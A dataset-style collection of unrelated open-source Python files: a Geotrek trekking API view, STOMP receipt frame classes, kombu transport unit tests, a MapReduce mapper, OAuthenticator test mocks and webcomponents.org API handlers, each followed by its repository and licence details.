queryset = queryset.annotate(geom2d_transformed=Transform(F('geom'), settings.API_SRID))
if self.action == 'list':
queryset = queryset.annotate(count_parents=Count('trek_parents')).\
exclude(Q(count_parents__gt=0) & Q(published=False))
if 'portal' in self.request.GET:
queryset = queryset.filter(Q(portal__name=self.request.GET['portal']) | Q(portal=None))
return queryset.annotate(start_point=Transform(StartPoint('geom'), settings.API_SRID),
end_point=Transform(EndPoint('geom'), settings.API_SRID)). \
filter(Q(**{'published_{lang}'.format(lang=lang): True})
| Q(**{'trek_parents__parent__published_{lang}'.format(lang=lang): True,
'trek_parents__parent__deleted': False})).distinct()
def get_serializer_context(self):
return {'root_pk': self.request.GET.get('root_pk')}
@decorators.action(detail=True, methods=['get'])
def pois(self, request, *args, **kwargs):
trek = self.get_object()
root_pk = self.request.GET.get('root_pk') or trek.pk
qs = trek.pois.filter(published=True).select_related('topo_object', 'type', )\
.prefetch_related('topo_object__aggregations', 'attachments') \
.annotate(geom2d_transformed=Transform(F('geom'), settings.API_SRID))
data = api_serializers_trekking.POIListSerializer(qs, many=True, context={'root_pk': root_pk}).data
return response.Response(data)
@decorators.action(detail=True, methods=['get'])
def touristic_contents(self, request, *args, **kwargs):
trek = self.get_object()
root_pk = self.request.GET.get('root_pk') or trek.pk
qs = trek.touristic_contents.filter(published=True).prefetch_related('attachments') \
.annotate(geom2d_transformed=Transform(F('geom'), settings.API_SRID))
data = api_serializers_tourism.TouristicContentListSerializer(qs, many=True, context={'root_pk': root_pk}).data
return response.Response(data)
@decorators.action(detail=True, methods=['get'])
def touristic_events(self, request, *args, **kwargs):
trek = self.get_object()
root_pk = self.request.GET.get('root_pk') or trek.pk
qs = trek.trek.touristic_events.filter(published=True).prefetch_related('attachments') \
.annotate(geom2d_transformed=Transform(F('geom'), settings.API_SRID))
data = api_serializers_tourism.TouristicEventListSerializer(qs, many=True, context={'root_pk': root_pk}).data
return response.Response(data)
|
makinacorpus/Geotrek
|
geotrek/api/mobile/views/trekking.py
|
Python
|
bsd-2-clause
| 4,033
|
#
# Copyright 2015 Geoff MacGill
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import with_statement
from ..base import ServerFrame
class Receipt(ServerFrame):
abstract = True
class Receipt10(Receipt):
version = '1.0'
verb = 'RECEIPT'
headers_required = ('receipt-id', )
class Receipt11(Receipt10):
version = '1.1'
class Receipt12(Receipt11):
version = '1.2'
|
skippyprime/stimpi
|
stimpi/frames/impl/receipt.py
|
Python
|
apache-2.0
| 1,058
|
from __future__ import absolute_import
from __future__ import with_statement
import warnings
from mock import patch
from kombu.connection import BrokerConnection
from kombu.exceptions import StdChannelError
from kombu.transport import virtual
from kombu.utils import uuid
from kombu.tests.compat import catch_warnings
from kombu.tests.utils import TestCase
from kombu.tests.utils import Mock, redirect_stdouts
def client(**kwargs):
return BrokerConnection(transport="kombu.transport.virtual.Transport",
**kwargs)
def memory_client():
return BrokerConnection(transport="memory")
class test_BrokerState(TestCase):
def test_constructor(self):
s = virtual.BrokerState()
self.assertTrue(hasattr(s, "exchanges"))
self.assertTrue(hasattr(s, "bindings"))
t = virtual.BrokerState(exchanges=16, bindings=32)
self.assertEqual(t.exchanges, 16)
self.assertEqual(t.bindings, 32)
class test_QoS(TestCase):
def setUp(self):
self.q = virtual.QoS(client().channel(), prefetch_count=10)
def tearDown(self):
self.q._on_collect.cancel()
def test_constructor(self):
self.assertTrue(self.q.channel)
self.assertTrue(self.q.prefetch_count)
self.assertFalse(self.q._delivered.restored)
self.assertTrue(self.q._on_collect)
@redirect_stdouts
def test_can_consume(self, stdout, stderr):
_restored = []
class RestoreChannel(virtual.Channel):
do_restore = True
def _restore(self, message):
_restored.append(message)
self.assertTrue(self.q.can_consume())
for i in range(self.q.prefetch_count - 1):
self.q.append(i, uuid())
self.assertTrue(self.q.can_consume())
self.q.append(i + 1, uuid())
self.assertFalse(self.q.can_consume())
tag1 = self.q._delivered.keys()[0]
self.q.ack(tag1)
self.assertTrue(self.q.can_consume())
tag2 = uuid()
self.q.append(i + 2, tag2)
self.assertFalse(self.q.can_consume())
self.q.reject(tag2)
self.assertTrue(self.q.can_consume())
self.q.channel = RestoreChannel(self.q.channel.connection)
tag3 = uuid()
self.q.append(i + 3, tag3)
self.q.reject(tag3, requeue=True)
self.q._flush()
self.q.restore_unacked_once()
self.assertListEqual(_restored, [11, 9, 8, 7, 6, 5, 4, 3, 2, 1])
self.assertTrue(self.q._delivered.restored)
self.assertFalse(self.q._delivered)
self.q.restore_unacked_once()
self.q._delivered.restored = False
self.q.restore_unacked_once()
self.assertTrue(stderr.getvalue())
self.assertFalse(stdout.getvalue())
def test_get(self):
self.q._delivered["foo"] = 1
self.assertEqual(self.q.get("foo"), 1)
class test_Message(TestCase):
def test_create(self):
c = client().channel()
data = c.prepare_message("the quick brown fox...")
tag = data["properties"]["delivery_tag"] = uuid()
message = c.message_to_python(data)
self.assertIsInstance(message, virtual.Message)
self.assertIs(message, c.message_to_python(message))
self.assertEqual(message.body,
"the quick brown fox...".encode("utf-8"))
self.assertTrue(message.delivery_tag, tag)
def test_create_no_body(self):
virtual.Message(Mock(), {
"body": None,
"properties": {"delivery_tag": 1}})
def test_serializable(self):
c = client().channel()
data = c.prepare_message("the quick brown fox...")
tag = data["properties"]["delivery_tag"] = uuid()
message = c.message_to_python(data)
dict_ = message.serializable()
self.assertEqual(dict_["body"],
"the quick brown fox...".encode("utf-8"))
self.assertEqual(dict_["properties"]["delivery_tag"], tag)
class test_AbstractChannel(TestCase):
def test_get(self):
with self.assertRaises(NotImplementedError):
virtual.AbstractChannel()._get("queue")
def test_put(self):
with self.assertRaises(NotImplementedError):
virtual.AbstractChannel()._put("queue", "m")
def test_size(self):
self.assertEqual(virtual.AbstractChannel()._size("queue"), 0)
def test_purge(self):
with self.assertRaises(NotImplementedError):
virtual.AbstractChannel()._purge("queue")
def test_delete(self):
with self.assertRaises(NotImplementedError):
virtual.AbstractChannel()._delete("queue")
def test_new_queue(self):
self.assertIsNone(virtual.AbstractChannel()._new_queue("queue"))
def test_has_queue(self):
self.assertTrue(virtual.AbstractChannel()._has_queue("queue"))
def test_poll(self):
class Cycle(object):
called = False
def get(self):
self.called = True
return True
cycle = Cycle()
self.assertTrue(virtual.AbstractChannel()._poll(cycle))
self.assertTrue(cycle.called)
class test_Channel(TestCase):
def setUp(self):
self.channel = client().channel()
def tearDown(self):
if self.channel._qos is not None:
self.channel._qos._on_collect.cancel()
def test_exchange_declare(self):
c = self.channel
c.exchange_declare("test_exchange_declare", "direct",
durable=True, auto_delete=True)
self.assertIn("test_exchange_declare", c.state.exchanges)
# can declare again with same values
c.exchange_declare("test_exchange_declare", "direct",
durable=True, auto_delete=True)
self.assertIn("test_exchange_declare", c.state.exchanges)
# using different values raises NotEquivalentError
with self.assertRaises(virtual.NotEquivalentError):
c.exchange_declare("test_exchange_declare", "direct",
durable=False, auto_delete=True)
def test_exchange_delete(self, ex="test_exchange_delete"):
class PurgeChannel(virtual.Channel):
purged = []
def _purge(self, queue):
self.purged.append(queue)
c = PurgeChannel(self.channel.connection)
c.exchange_declare(ex, "direct", durable=True, auto_delete=True)
self.assertIn(ex, c.state.exchanges)
self.assertNotIn(ex, c.state.bindings) # no bindings yet
c.exchange_delete(ex)
self.assertNotIn(ex, c.state.exchanges)
c.exchange_declare(ex, "direct", durable=True, auto_delete=True)
c.queue_declare(ex)
c.queue_bind(ex, ex, ex)
self.assertTrue(c.state.bindings[ex])
c.exchange_delete(ex)
self.assertNotIn(ex, c.state.bindings)
self.assertIn(ex, c.purged)
def test_queue_delete__if_empty(self, n="test_queue_delete__if_empty"):
class PurgeChannel(virtual.Channel):
purged = []
size = 30
def _purge(self, queue):
self.purged.append(queue)
def _size(self, queue):
return self.size
c = PurgeChannel(self.channel.connection)
c.exchange_declare(n)
c.queue_declare(n)
c.queue_bind(n, n, n)
c.queue_bind(n, n, n) # tests code path that returns
# if queue already bound.
c.queue_delete(n, if_empty=True)
self.assertIn(n, c.state.bindings)
c.size = 0
c.queue_delete(n, if_empty=True)
self.assertNotIn(n, c.state.bindings)
self.assertIn(n, c.purged)
def test_queue_purge(self, n="test_queue_purge"):
class PurgeChannel(virtual.Channel):
purged = []
def _purge(self, queue):
self.purged.append(queue)
c = PurgeChannel(self.channel.connection)
c.exchange_declare(n)
c.queue_declare(n)
c.queue_bind(n, n, n)
c.queue_purge(n)
self.assertIn(n, c.purged)
def test_basic_publish__get__consume__restore(self,
n="test_basic_publish"):
c = memory_client().channel()
c.exchange_declare(n)
c.queue_declare(n)
c.queue_bind(n, n, n)
c.queue_declare(n + "2")
c.queue_bind(n + "2", n, n)
m = c.prepare_message("nthex quick brown fox...")
c.basic_publish(m, n, n)
r1 = c.message_to_python(c.basic_get(n))
self.assertTrue(r1)
self.assertEqual(r1.body,
"nthex quick brown fox...".encode("utf-8"))
self.assertIsNone(c.basic_get(n))
consumer_tag = uuid()
c.basic_consume(n + "2", False, consumer_tag=consumer_tag,
callback=lambda *a: None)
self.assertIn(n + "2", c._active_queues)
r2, _ = c.drain_events()
r2 = c.message_to_python(r2)
self.assertEqual(r2.body,
"nthex quick brown fox...".encode("utf-8"))
self.assertEqual(r2.delivery_info["exchange"], n)
self.assertEqual(r2.delivery_info["routing_key"], n)
with self.assertRaises(virtual.Empty):
c.drain_events()
c.basic_cancel(consumer_tag)
c._restore(r2)
r3 = c.message_to_python(c.basic_get(n))
self.assertTrue(r3)
self.assertEqual(r3.body, "nthex quick brown fox...".encode("utf-8"))
self.assertIsNone(c.basic_get(n))
def test_basic_ack(self):
class MockQoS(virtual.QoS):
was_acked = False
def ack(self, delivery_tag):
self.was_acked = True
self.channel._qos = MockQoS(self.channel)
self.channel.basic_ack("foo")
self.assertTrue(self.channel._qos.was_acked)
def test_basic_recover__requeue(self):
class MockQoS(virtual.QoS):
was_restored = False
def restore_unacked(self):
self.was_restored = True
self.channel._qos = MockQoS(self.channel)
self.channel.basic_recover(requeue=True)
self.assertTrue(self.channel._qos.was_restored)
def test_restore_unacked_raises_BaseException(self):
q = self.channel.qos
q._flush = Mock()
q._delivered = {1: 1}
q.channel._restore = Mock()
q.channel._restore.side_effect = SystemExit
errors = q.restore_unacked()
self.assertIsInstance(errors[0][0], SystemExit)
self.assertEqual(errors[0][1], 1)
self.assertFalse(q._delivered)
@patch("kombu.transport.virtual.emergency_dump_state")
@patch("kombu.transport.virtual.say")
def test_restore_unacked_once_when_unrestored(self, say,
emergency_dump_state):
q = self.channel.qos
q._flush = Mock()
class State(dict):
restored = False
q._delivered = State({1: 1})
ru = q.restore_unacked = Mock()
exc = None
try:
raise KeyError()
except KeyError, exc_:
exc = exc_
ru.return_value = [(exc, 1)]
self.channel.do_restore = True
q.restore_unacked_once()
self.assertTrue(say.called)
self.assertTrue(emergency_dump_state.called)
def test_basic_recover(self):
with self.assertRaises(NotImplementedError):
self.channel.basic_recover(requeue=False)
def test_basic_reject(self):
class MockQoS(virtual.QoS):
was_rejected = False
def reject(self, delivery_tag, requeue=False):
self.was_rejected = True
self.channel._qos = MockQoS(self.channel)
self.channel.basic_reject("foo")
self.assertTrue(self.channel._qos.was_rejected)
def test_basic_qos(self):
self.channel.basic_qos(prefetch_count=128)
self.assertEqual(self.channel._qos.prefetch_count, 128)
def test_lookup__undeliverable(self, n="test_lookup__undeliverable"):
warnings.resetwarnings()
with catch_warnings(record=True) as log:
self.assertListEqual(self.channel._lookup(n, n, "ae.undeliver"),
["ae.undeliver"])
self.assertTrue(log)
self.assertIn("could not be delivered", log[0].message.args[0])
def test_context(self):
x = self.channel.__enter__()
self.assertIs(x, self.channel)
x.__exit__()
self.assertTrue(x.closed)
def test_cycle_property(self):
self.assertTrue(self.channel.cycle)
def test_flow(self):
with self.assertRaises(NotImplementedError):
self.channel.flow(False)
def test_close_when_no_connection(self):
self.channel.connection = None
self.channel.close()
self.assertTrue(self.channel.closed)
def test_drain_events_has_get_many(self):
c = self.channel
c._get_many = Mock()
c._poll = Mock()
c._consumers = [1]
c._qos = Mock()
c._qos.can_consume.return_value = True
c.drain_events(timeout=10.0)
c._get_many.assert_called_with(c._active_queues, timeout=10.0)
def test_get_exchanges(self):
self.channel.exchange_declare(exchange="foo")
self.assertTrue(self.channel.get_exchanges())
def test_basic_cancel_not_in_active_queues(self):
c = self.channel
c._consumers.add("x")
c._tag_to_queue["x"] = "foo"
c._active_queues = Mock()
c._active_queues.remove.side_effect = ValueError()
c.basic_cancel("x")
c._active_queues.remove.assert_called_with("foo")
def test_basic_cancel_unknown_ctag(self):
self.assertIsNone(self.channel.basic_cancel("unknown-tag"))
def test_list_bindings(self):
c = self.channel
c.exchange_declare(exchange="foo")
c.queue_declare(queue="q")
c.queue_bind(queue="q", exchange="foo", routing_key="rk")
self.assertIn(("q", "foo", "rk"), list(c.list_bindings()))
def test_after_reply_message_received(self):
c = self.channel
c.queue_delete = Mock()
c.after_reply_message_received("foo")
c.queue_delete.assert_called_with("foo")
def test_queue_delete_unknown_queue(self):
self.assertIsNone(self.channel.queue_delete("xiwjqjwel"))
def test_queue_declare_passive(self):
has_queue = self.channel._has_queue = Mock()
has_queue.return_value = False
with self.assertRaises(StdChannelError):
self.channel.queue_declare(queue="21wisdjwqe", passive=True)
class test_Transport(TestCase):
def setUp(self):
self.transport = client().transport
def test_custom_polling_interval(self):
x = client(transport_options=dict(polling_interval=32.3))
self.assertEqual(x.transport.polling_interval, 32.3)
def test_close_connection(self):
c1 = self.transport.create_channel(self.transport)
c2 = self.transport.create_channel(self.transport)
self.assertEqual(len(self.transport.channels), 2)
self.transport.close_connection(self.transport)
self.assertFalse(self.transport.channels)
del(c1) # so pyflakes doesn't complain
del(c2)
def test_drain_channel(self):
channel = self.transport.create_channel(self.transport)
with self.assertRaises(virtual.Empty):
self.transport._drain_channel(channel)
|
anistark/mozillians
|
vendor-local/lib/python/kombu/tests/transport/virtual/test_base.py
|
Python
|
bsd-3-clause
| 15,569
|
class MapperSimilarity:
def __init__ (self,maxPictures):
self.maxPictures = maxPictures;
def map(self,theContext):
mapIterator = theContext.iterator;
pictureIdx = mapIterator.getNext().rstrip('\n');
while pictureIdx:
pictureIdx = int(pictureIdx);
for i in range(pictureIdx,self.maxPictures):
theContext.putKeyValue(pictureIdx, i)
pictureIdx = mapIterator.getNext().rstrip('\n');
|
neosky2142/PyMR
|
src/MapperSimilarity.py
|
Python
|
mit
| 477
|
"""Mocking utilities for testing"""
from io import BytesIO
import json
import os
import re
from unittest.mock import Mock
from urllib.parse import urlparse, parse_qs
import uuid
import pytest
from tornado.httpclient import HTTPResponse
from tornado.httputil import HTTPServerRequest
from tornado.log import app_log
from tornado.simple_httpclient import SimpleAsyncHTTPClient
from tornado import web
RegExpType = type(re.compile('.'))
class MockAsyncHTTPClient(SimpleAsyncHTTPClient):
"""A mock AsyncHTTPClient that allows registering handlers for mocked requests
Call .add_host to mock requests made to a given host.
"""
def initialize(self, *args, **kwargs):
super().initialize(*args, **kwargs)
self.hosts = {}
def add_host(self, host, paths):
"""Add a host whose requests should be mocked.
Args:
host (str): the host to mock (e.g. 'api.github.com')
paths (list(str|regex, callable)): a list of paths (or regexps for paths)
and callables to be called for those paths.
The mock handlers will receive the request as their only argument.
Mock handlers can return:
- None
- int (empty response with this status code)
- str, bytes for raw response content (status=200)
- list, dict for JSON response (status=200)
- HTTPResponse (passed unmodified)
Example::
client.add_host('api.github.com', [
('/user': lambda request: {'login': 'name'})
])
"""
self.hosts[host] = paths
def fetch_impl(self, request, response_callback):
urlinfo = urlparse(request.url)
host = urlinfo.hostname
if host not in self.hosts:
app_log.warning("Not mocking request to %s", request.url)
return super().fetch_impl(request, response_callback)
paths = self.hosts[host]
response = None
for path_spec, handler in paths:
if isinstance(path_spec, str):
if path_spec == urlinfo.path:
response = handler(request)
break
else:
if path_spec.match(urlinfo.path):
response = handler(request)
break
if response is None:
response = HTTPResponse(request=request, code=404, reason=request.url)
elif isinstance(response, int):
response = HTTPResponse(request=request, code=response)
elif isinstance(response, bytes):
response = HTTPResponse(request=request, code=200,
buffer=BytesIO(response),
)
elif isinstance(response, str):
response = HTTPResponse(request=request, code=200,
buffer=BytesIO(response.encode('utf8')),
)
elif isinstance(response, (dict, list)):
response = HTTPResponse(request=request, code=200,
buffer=BytesIO(json.dumps(response).encode('utf8')),
headers={'Content-Type': 'application/json'},
)
response_callback(response)
def setup_oauth_mock(client, host, access_token_path, user_path,
token_type='Bearer',
token_request_style='post',
):
"""setup the mock client for OAuth
generates and registers two handlers common to OAuthenticators:
- create the access token (POST access_token_path)
- get the user info (GET user_path)
and adds a method for creating a new mock handler to pass to .authenticate():
client.handler_for_user(user)
where user is the user-model to be returned by the user request.
Args:
host (str): the host to mock (e.g. api.github.com)
access_token_path (str): The path for the access token request (e.g. /access_token)
user_path (str): The path for requesting (e.g. /user)
token_type (str): the token_type field for the provider
"""
client.oauth_codes = oauth_codes = {}
client.access_tokens = access_tokens = {}
def access_token(request):
"""Handler for access token endpoint
Checks code and allocates a new token.
Replies with JSON model for the token.
"""
assert request.method == 'POST', request.method
if token_request_style == 'json':
body = request.body.decode('utf8')
try:
body = json.loads(body)
except ValueError:
return HTTPResponse(request=request, code=400,
reason="Body not JSON: %r" % body,
)
else:
code = body['code']
else:
query = urlparse(request.url).query
if not query:
query = request.body.decode('utf8')
query = parse_qs(query)
if 'code' not in query:
return HTTPResponse(request=request, code=400,
reason="No code in access token request: url=%s, body=%s" % (
request.url, request.body,
)
)
code = query['code'][0]
if code not in oauth_codes:
return HTTPResponse(request=request, code=403,
reason="No such code: %s" % code,
)
# consume code, allocate token
token = uuid.uuid4().hex
user = oauth_codes.pop(code)
access_tokens[token] = user
return {
'access_token': token,
'token_type': token_type,
}
def get_user(request):
assert request.method == 'GET', request.method
auth_header = request.headers.get('Authorization')
if auth_header:
token = auth_header.split(None, 1)[1]
else:
query = parse_qs(urlparse(request.url).query)
if 'access_token' in query:
token = query['access_token'][0]
else:
return HTTPResponse(request=request, code=403,
reason='Missing Authorization header',
)
if token not in access_tokens:
return HTTPResponse(request=request, code=403,
reason='No such access token: %r' % token,
)
return access_tokens.get(token)
if isinstance(host, str):
hosts = [host]
else:
hosts = host
for host in hosts:
client.add_host(host, [
(access_token_path, access_token),
(user_path, get_user),
])
def handler_for_user(user):
"""Return a new mock RequestHandler
user should be the JSONable model that will ultimately be returned
from the get_user request.
"""
code = uuid.uuid4().hex
oauth_codes[code] = user
handler = Mock(spec=web.RequestHandler)
handler.get_argument = Mock(return_value=code)
handler.request = HTTPServerRequest(
method='GET',
uri='https://hub.example.com?code=%s' % code
)
handler.hub = Mock(server=Mock(base_url='/hub/'), base_url='/hub/')
return handler
client.handler_for_user = handler_for_user
def mock_handler(Handler, uri='https://hub.example.com', method='GET', **settings):
"""Instantiate a Handler in a mock application"""
application = web.Application(
hub=Mock(
base_url='/hub/',
server=Mock(
base_url='/hub/'
),
),
cookie_secret=os.urandom(32),
db=Mock(
rollback=Mock(return_value=None)
),
**settings
)
request = HTTPServerRequest(
method=method,
uri=uri,
connection=Mock(),
)
handler = Handler(
application=application,
request=request,
)
handler._transforms = []
return handler
async def no_code_test(authenticator):
"""Run a test to exercise no code in the request"""
handler = Mock(spec=web.RequestHandler)
handler.get_argument = Mock(return_value=None)
with pytest.raises(web.HTTPError) as exc:
name = await authenticator.authenticate(handler)
assert exc.value.status_code == 400
|
NickolausDS/oauthenticator
|
oauthenticator/tests/mocks.py
|
Python
|
bsd-3-clause
| 8,314
|
from google.appengine.ext import ndb
from google.appengine.api import search
from google.appengine.api import urlfetch
import logging
import json
import re
import urllib
from urlparse import urlparse
import webapp2
from datamodel import Author, Library, Version, Content, Dependency, Status, Sitemap
import versiontag
import util
class SearchContents(webapp2.RequestHandler):
@ndb.toplevel
def get(self, terms):
self.response.headers['Access-Control-Allow-Origin'] = '*'
scoring = self.request.get('noscore', None) is None
include_results = self.request.get('noresults', None) is None
include_count = self.request.get('count', None) is not None
request_cursor = self.request.get('cursor', None)
if not include_results:
scoring = False
include_count = True
try:
limit = min(20, int(self.request.get('limit', 20)))
except ValueError:
self.response.set_status(400)
return
index = search.Index('repo')
cursor = search.Cursor(web_safe_string=request_cursor)
try:
# Accuracy refers to accurate till n results.
accuracy = 2000 if include_count else None
sort_options = search.SortOptions(match_scorer=search.MatchScorer()) if scoring else None
query_options = search.QueryOptions(limit=limit, number_found_accuracy=accuracy, sort_options=sort_options, cursor=cursor)
search_results = index.search(search.Query(query_string=terms, options=query_options))
cursor = search_results.cursor
except search.QueryError:
self.response.set_status(400)
self.response.write('bad query')
return
count = search_results.number_found
if include_results:
result_futures = []
for result in search_results.results:
(owner, repo) = result.doc_id.split('/')
version = None
for field in result.fields:
if field.name == 'version':
version = field.value
break
library_key = ndb.Key(Library, Library.id(owner, repo))
result_futures.append(LibraryMetadata.brief_async(library_key, version, assume_latest=True))
results = []
for future in result_futures:
result = yield future
if result is None:
# Fixup count when we skip over incomplete entries.
count = count - 1
if result is not None:
results.append(result)
result = {
'cursor': cursor.web_safe_string if cursor and include_results else None,
}
if include_count:
result['count'] = count
if include_results:
result['results'] = results
self.response.headers['Content-Type'] = 'application/json'
self.response.write(json.dumps(result))
class LibraryMetadata(object):
@staticmethod
@ndb.tasklet
def brief_async(library_key, tag=None, assume_latest=False):
metadata = yield LibraryMetadata.full_async(library_key, tag=tag, brief=True, assume_latest=assume_latest)
if metadata is None or metadata['status'] != Status.ready:
raise ndb.Return(None)
result = {
'owner': metadata['owner'],
'repo': metadata['repo'],
'version': metadata['version'],
'kind': metadata['kind'],
'description': metadata['description'],
'stars': metadata['stars'],
'subscribers': metadata['subscribers'],
'forks': metadata['forks'],
'updated_at': metadata['updated_at'],
'avatar_url': metadata['avatar_url'],
}
if 'dependency_count' in metadata:
result['dependency_count'] = metadata['dependency_count']
if 'npmFullPackage' in metadata:
result['npmFullPackage'] = metadata['npmFullPackage']
if 'npmPackage' in metadata:
result['npmPackage'] = metadata['npmPackage']
if not assume_latest:
result['latest_version'] = metadata['latest_version']
result['default_version'] = metadata['default_version']
raise ndb.Return(result)
@staticmethod
@ndb.tasklet
def full_async(library_key, tag=None, brief=False, assume_latest=False):
if assume_latest:
assert tag is not None
library_future = library_key.get_async()
if tag is None or not brief or not assume_latest:
versions_future = Library.versions_for_key_async(library_key)
if tag is None:
versions = yield versions_future
default_version = versiontag.default_version(versions)
version_key = None if len(versions) == 0 else ndb.Key(Library, library_key.id(), Version, default_version)
else:
version_key = ndb.Key(Library, library_key.id(), Version, tag)
if version_key is not None:
version_future = version_key.get_async()
bower_future = Content.get_by_id_async('bower', parent=version_key)
if not brief:
readme_future = Content.get_by_id_async('readme.html', parent=version_key)
library = yield library_future
if library is None or library.status == Status.suppressed:
raise ndb.Return(None)
result = {}
# Add NPM package fields
key = library_key.string_id()
if key.startswith('@'):
parts = key.split('/')
if parts[0] != '@@npm':
result['npmScope'] = parts[0]
result['npmFullPackage'] = key
else:
result['npmFullPackage'] = parts[1]
result['npmPackage'] = parts[1]
if library.migrated_from_bower:
result['migratedFromBower'] = True
elif library.npm_package:
result['migratedToNpm'] = library.npm_package
result['apiKey'] = key
result['kind'] = library.kind
result['status'] = library.status
if library.status != Status.ready:
if library.status == Status.error:
result['error'] = library.error
raise ndb.Return(result)
version = None
if version_key is not None:
version = yield version_future
if version is None:
raise ndb.Return(None)
result['spdx_identifier'] = library.spdx_identifier
result['version'] = version.key.id()
if version.status != Status.ready:
result['status'] = version.status
if version.status == Status.error:
result['error'] = version.error
raise ndb.Return(result)
if not brief or not assume_latest:
versions = yield versions_future
result['versions'] = versions
if len(versions) > 0:
result['default_version'] = versiontag.default_version(versions)
# Remove latest_version once deployed clients all use default_version
result['latest_version'] = versiontag.default_version(versions)
if not brief and library.participation is not None:
result['activity'] = json.loads(library.participation).get('all', [])
if not brief and library.contributors is not None:
contributors = []
raw = json.loads(library.contributors)
for contributor in raw:
contributors.append({
'login': contributor['login'],
'avatar_url': contributor['avatar_url'],
'contributions': contributor['contributions'],
})
result['contributors'] = contributors
if library.metadata is not None:
metadata = json.loads(library.metadata)
result['description'] = metadata.get('description', '')
result['subscribers'] = metadata.get('subscribers_count', 0)
result['stars'] = metadata.get('stargazers_count', 0)
result['forks'] = metadata.get('forks', 0)
result['open_issues'] = metadata.get('open_issues', 0)
result['updated_at'] = metadata.get('updated_at', 0)
result['owner'] = metadata['owner']['login']
result['avatar_url'] = metadata['owner'].get('avatar_url', '')
result['repo'] = metadata['name']
if metadata.get('homepage') and re.match(r'https?', metadata.get('homepage')):
result['homepage'] = metadata['homepage']
result['default_branch'] = metadata.get('default_branch', 'master')
if not brief:
readme = yield readme_future
result['readme'] = None if readme is None else readme.content
bower = yield bower_future
if bower is not None:
bower_json = bower.get_json()
dependencies = bower_json.get('dependencies', {})
result['dependency_count'] = len(dependencies)
result['bower'] = {
'license': bower_json.get('license', ''),
'dependencies': dependencies,
'keywords': bower_json.get('keywords', []),
'demos': bower_json.get('demos', {}),
'pages': bower_json.get('pages', {}),
}
if result.get('description', '') == '':
result['description'] = bower_json.get('description', '')
raise ndb.Return(result)
class GetCollections(webapp2.RequestHandler):
@ndb.toplevel
def get(self, owner, repo, version=None):
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.headers['Content-Type'] = 'application/json'
library_key = ndb.Key(Library, Library.id(owner, repo))
if version is None:
version = yield Library.default_version_for_key_async(library_key)
if version is None:
self.response.set_status(404)
return
version_key = ndb.Key(Library, library_key.id(), Version, version)
collection_versions = yield Version.collections_for_key_async(version_key)
collection_futures = []
for collection_version in collection_versions:
collection_futures.append(LibraryMetadata.brief_async(collection_version.key.parent(), collection_version.key.id()))
collections = []
for future in collection_futures:
collection_result = yield future
if collection_result is not None:
collections.append(collection_result)
result = {
'results': collections,
'count': len(collections),
}
self.response.write(json.dumps(result))
class GetDependencies(webapp2.RequestHandler):
@ndb.toplevel
def get(self, owner, repo, version=None):
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.headers['Content-Type'] = 'application/json'
library_key = ndb.Key(Library, Library.id(owner, repo))
if version is None:
version = yield Library.default_version_for_key_async(library_key)
if version is None:
self.response.set_status(404)
return
version_key = ndb.Key(Library, library_key.id(), Version, version)
bower = yield Content.get_by_id_async('bower', parent=version_key)
if bower is None:
self.response.set_status(404)
return
bower_json = bower.get_json()
bower_dependencies = bower_json.get('dependencies', {})
dependencies = []
version_futures = []
for name in bower_dependencies.keys():
dependency = Dependency.from_string(bower_dependencies[name])
if dependency is None:
continue
dependencies.append(dependency)
dependency_library_key = ndb.Key(Library, Library.id(dependency.owner, dependency.repo))
version_futures.append(Library.versions_for_key_async(dependency_library_key))
dependency_futures = []
for i, dependency in enumerate(dependencies):
versions = yield version_futures[i]
def matches(version, spec):
try:
return versiontag.match(version, spec)
except ValueError:
# FIXME: What other cases do we need to support here?
return False
while len(versions) > 0 and not matches(versions[-1], dependency.version):
versions.pop()
if len(versions) > 0:
dependency_library_key = ndb.Key(Library, Library.id(dependency.owner.lower(), dependency.repo.lower()))
dependency_futures.append(LibraryMetadata.brief_async(dependency_library_key, versions[-1]))
results = []
for future in dependency_futures:
dependency_result = yield future
if dependency_result is not None:
results.append(dependency_result)
result = {
'results': results,
'count': len(results),
}
self.response.write(json.dumps(result))
class GetMetadata(webapp2.RequestHandler):
@ndb.toplevel
def get(self, owner, repo, ver=None):
self.response.headers['Access-Control-Allow-Origin'] = '*'
owner = owner.lower()
repo = repo.lower()
library_key = ndb.Key(Library, Library.id(owner, repo))
result = yield LibraryMetadata.full_async(library_key, ver)
if result is None:
self.response.set_status(404)
else:
self.response.headers['Content-Type'] = 'application/json'
if result['status'] != Status.ready:
self.response.set_status(400)
self.response.write(json.dumps(result))
class GetDocs(webapp2.RequestHandler):
@ndb.toplevel
def get(self, owner, repo, ver=None):
use_analyzer_data = self.request.get('use_analyzer_data', None) is not None
self.response.headers['Access-Control-Allow-Origin'] = '*'
owner = owner.lower()
repo = repo.lower()
library_key = ndb.Key(Library, Library.id(owner, repo))
if ver is None:
ver = yield Library.default_version_for_key_async(library_key)
if ver is None:
self.response.set_status(404)
return
version_key = ndb.Key(Library, Library.id(owner, repo), Version, ver)
analysis = Content.get_by_id('analysis', parent=version_key, read_policy=ndb.EVENTUAL_CONSISTENCY)
if analysis is None:
self.response.set_status(404)
return
self.response.headers['Content-Type'] = 'application/json'
result = {}
result['status'] = analysis.status
if analysis.status == Status.ready:
content = analysis.get_json()
has_analyzer_data = content.get('analyzerData', None) is not None
if use_analyzer_data and has_analyzer_data:
# Use the analyzer data fields
result['analysis'] = content['analyzerData']
else:
# Use the hydrolysis fields and delete the analyzer ones
if has_analyzer_data:
del content['analyzerData']
result['content'] = content
if analysis.status == Status.error:
result['error'] = analysis.error
if result['status'] != Status.ready:
self.response.set_status(400)
self.response.headers['Content-Type'] = 'application/json'
self.response.write(json.dumps(result))
class GetPage(webapp2.RequestHandler):
@ndb.toplevel
def get(self, owner, repo, ver, path):
self.response.headers['Access-Control-Allow-Origin'] = '*'
version_key = ndb.Key(Library, Library.id(owner, repo), Version, ver)
if version_key is None:
self.response.set_status(404)
self.response.write('Invalid repo/version')
return
